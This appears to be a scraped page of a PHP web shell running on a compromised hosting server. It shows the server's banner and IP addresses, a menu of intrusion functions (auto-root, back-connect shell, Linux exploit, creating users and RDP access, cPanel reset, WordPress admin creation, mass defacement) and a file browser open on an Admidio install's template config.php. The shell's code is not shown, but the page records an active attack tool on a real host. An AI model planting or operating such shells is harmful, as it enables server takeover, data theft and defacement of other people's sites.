Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 3.17.81.34
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
admidio /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
6.33
KB
-rw-r--r--
config.php
1.39
KB
-rw-r--r--
edit.php
4.63
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
3.3
KB
-rw-r--r--
fileindex.php
142
B
-rw-r--r--
import.php
4.12
KB
-rw-r--r--
info.xml
2.88
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.77
KB
-rw-r--r--
install.xml
28.64
KB
-rw-r--r--
md5
2.67
KB
-rw-r--r--
notes.txt
440
B
-rw-r--r--
update_pass.php
2.02
KB
-rw-r--r--
upgrade.php
4.63
KB
-rw-r--r--
upgrade.xml
363
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** *********************************************************************************************** * Configuration file of Admidio * * @copyright The Admidio Team * @see https://www.admidio.org/ * @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License v2.0 only *********************************************************************************************** */ // Select your database system for example 'mysql' or 'pgsql' $gDbType = 'mysql'; // Access to the database of the SQL-Server $g_adm_srv = '[[softdbhost]]'; // Host $g_adm_port = null; // Port $g_adm_db = '[[softdb]]'; // Database-Name $g_adm_usr = '[[softdbuser]]'; // Username $g_adm_pw = '[[softdbpass]]'; // Password // Table prefix for Admidio-Tables in database // Example: 'adm' $g_tbl_praefix = '[[dbprefix]]'; // URL to this Admidio installation // Example: 'https://www.admidio.org/example' $g_root_path = '[[softurl]]'; // The name of the timezone in which your organization is located. // This must be one of the strings that are defined here https://www.php.net/manual/en/timezones.php // Example: 'Europe/Berlin' $gTimezone = '[[time_zone]]'; // If this flag is set = 1 then you must enter your loginname and password // for an update of the Admidio database to a new version of Admidio. // For a more comfortable and easy update you can set this preference = 0. $gLoginForUpdate = 1;
Close